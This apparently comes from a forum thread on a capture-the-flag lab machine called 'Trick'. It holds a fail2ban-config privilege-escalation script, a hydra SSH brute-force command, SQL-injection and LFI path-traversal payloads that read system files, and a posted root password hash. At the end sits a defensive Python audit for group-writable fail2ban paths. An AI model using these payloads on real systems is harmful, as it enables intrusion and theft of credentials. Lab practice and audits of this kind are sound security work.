(June 20, 2022, 05:29 PM) r46j Wrote:
> Hello,
> Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine? Please can anyone help me.
> ```
> michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
> rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
> ```

User Michael and action.d have the same group (security). You can delete/rename/move/create files in the action.d group.

(June 20, 2022, 05:31 PM) hacker1111 Wrote:
> (June 20, 2022, 05:29 PM) r46j Wrote:
> > Hello,
> > Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine? Please can anyone help me.
> > ```
> > michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
> > rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
> > ```
>
> User Michael and action.d have the same group (security). You can delete/rename/move/create files in the action.d group.

Thanks, got root access.

(June 20, 2022, 06:31 PM) r46j Wrote:
> (June 20, 2022, 05:31 PM) hacker1111 Wrote:
> > (June 20, 2022, 05:29 PM) r46j Wrote:
> > > Hello,
> > > Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine? Please can anyone help me.
> > > ```
> > > michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
> > > rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
> > > ```
> >
> > User Michael and action.d have the same group (security). You can delete/rename/move/create files in the action.d group.
>
> Thanks, got root access.

how was your step by step to access root?
☠ fuck ☠

June 20, 2022 at 10:47 PM
should work
```
#!/bin/bash
file="/etc/fail2ban/action.d/iptables-multiport.conf"
fs=$(cat "$file")
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
touch /tmp/flag.txt
res=$(echo "$fs" | sed "s/ -I f2b- 1 -s -j / cat \/root\/root.txt >> \/tmp\/flag.txt /g") # instead of "cat \/root\/root.txt > \/tmp\/root.txt" u can use ur own payload
echo "$res" >> /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
sleep 15
echo "Done! Brute ssh now! Leave ur hydra or whatever u use just for 1min to work. Check /tmp/flag.txt after"
```

okk! , this is the most basic way to get root privileges for this device in case you don't know how fail2ban works, a bit s-kiddie but it will save you time in getting the root shell:
--> script : https://github.com/rvizx/fail2ban/blob/main/fail2ban.py (thanks to rvizx)
--> at Trick machine : python3 fail2ban.py
--> wait for the message "[!] bash -p will be executed in 100s" then run hydra at local : hydra -l root -P rockyou.txt ssh
===> You will get root shell in a few minutes.
and here is the root hash for those interested in learning:
root:$6$lbBzS2rUUVRa6Erd$u2u317eVZBZgdCrT2HViYv.69vxazyKjAuVETHTpTpD42H0RDPQIbsCHwPdKqBQphI/FOmpEt3lgD9QBsu6nU1:19104:0:99999:7:::

(June 21, 2022, 07:48 AM) Mefistogr Wrote:
> @z3r0Day
> This link "--> script : https://github.com/rvizx/fail2ban/blob/main/fail2ban.py
> ..gives a 404 error

Just because the repository has been updated and switched from Python to Bash. Here you have all the details, but just "bon sens" should be enough: https://github.com/rvizx/fail2ban/

(June 19, 2022, 12:51 PM) fironeDerbert Wrote:
> New subdomain: http://preprod-marketing.trick.htb
> And LFI! http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
> Take the id_rsa and get the SSH :D

The LFI is not working for me. I can get files in the same folder, but not anything else. Is there a trick to it?
Edit: nevermind I've worked out what I was doing wrong

(June 20, 2022, 05:23 PM) hacker1111 Wrote:
> (June 20, 2022, 02:02 PM) wienerpeter Wrote:
> > hey guys how did you get the second subdomain marketing one!
>
> view-source:http://preprod-payroll.trick.htb/manage_employee.php?id=-1+union+select+1,2,load_file('/etc/nginx/sites-available/default'),4,5,6,7,8

I like this one, very nice!

(June 22, 2022, 02:25 AM) l3arner3D Wrote:
> (June 19, 2022, 12:51 PM) fironeDerbert Wrote:
> > New subdomain: http://preprod-marketing.trick.htb
> > And LFI! http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
> > Take the id_rsa and get the SSH :D
>
> The LFI is not working for me. I can get files in the same folder, but not anything else. Is there a trick to it?
> Edit: nevermind I've worked out what I was doing wrong

I'm stuck on the same thing? How did you figure it out?

June 23, 2022 at 10:23 PM
(June 19, 2022, 12:51 PM) fironeDerbert Wrote:
> New subdomain: http://preprod-marketing.trick.htb
> And LFI! http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
> Take the id_rsa and get the SSH :D

I have found LFI and have done the same. Just 'curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd' then intercepted burp request and modified '=....//..../....//etc/passwd' but it didn't work. String in response <script>$('.nav-....//....//....//etc/passwd').addClass('active')</script> alarms me a little bit
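
The root escalation discussed earlier in this thread depends on action.d being writable by a non-root group while fail2ban, which typically runs as root, executes the commands defined there, so a read-only file inside it can still be deleted and replaced. The following is an added example, not code from any poster or from the fail2ban project: a Python audit that flags such paths. The function names and the temporary sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

def audit_tree(root, trusted_uids=frozenset({0}), trusted_gids=frozenset({0})):
    """List paths under root that someone other than a trusted owner/group can alter."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink mode bits carry no meaning on Linux
            kind = "dir" if stat.S_ISDIR(st.st_mode) else "file"
            rel = os.path.relpath(path, root)
            if st.st_uid not in trusted_uids:
                findings.append((rel, kind, "untrusted-owner"))
            if st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
                findings.append((rel, kind, "group-writable"))
            if st.st_mode & stat.S_IWOTH:
                findings.append((rel, kind, "world-writable"))
    return findings

def build_sample_tree():
    """Constructed layout mirroring the thread: read-only file, group-writable dir."""
    root = tempfile.mkdtemp(prefix="f2b-audit-")
    action_d = os.path.join(root, "action.d")
    os.mkdir(action_d)
    conf = os.path.join(action_d, "iptables-multiport.conf")
    with open(conf, "w") as fh:
        fh.write("# constructed placeholder\n")
    os.chmod(conf, 0o644)      # the file itself is not writable by the group
    os.chmod(action_d, 0o775)  # but the directory is, so its entries can be replaced
    return root

def demo():
    root = build_sample_tree()
    # Assumption for the demo: the current user stands in for root as the
    # trusted owner, and no group is trusted.
    return audit_tree(root, trusted_uids={os.getuid()}, trusted_gids=frozenset())

if __name__ == "__main__":
    for rel, kind, reason in demo():
        print(f"{reason:16} {kind:4} {rel}")
```

On a real host, call `audit_tree("/etc/fail2ban")` with the defaults; any finding on a directory matters as much as one on a file, because write access to the directory is what allows a protected file to be swapped.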